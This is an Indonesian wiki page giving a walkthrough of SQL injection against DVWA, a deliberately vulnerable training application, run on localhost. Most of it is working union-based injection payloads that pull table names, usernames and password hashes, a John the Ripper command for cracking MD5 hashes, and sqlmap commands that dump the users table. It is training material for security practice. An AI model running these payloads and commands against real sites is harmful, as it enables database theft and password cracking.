DVWA: SQLi blind

From OnnoWiki
Revision as of 07:51, 4 March 2017 by Onnowpurbo (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

DVWA-BLIND SQL INJECTION : LOW Level

Username :  Admin
Password : Password
  • Pilih SQL Injection BLIND dan dalam kolom ID masukan
1' and 1=1#
1' and 1=1 order by 2 #
ID: 'or' 1=1--

Kita akan lihat ada 5 user

  • Melihat informasi table
1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #
  • Melihat informasi table name dari table user
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #
  • Terakhir lihat username dan password
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  • Crack md5 password
copy hasil password hash yang diperoleh, save misalnya dengan nama hash

Lakukan

 root@bt:/pentest/passwords/john#./john --format=raw-md5 hash 


Exploit DVWA menggunakan SQLmap

  • Login ke DVWA
  • Pilih DVWA Security Low
  • Pada user ID tulis '1
  • Jalankan addon tamer di browser
  • Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

  • lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  • lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  • lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump

Referensi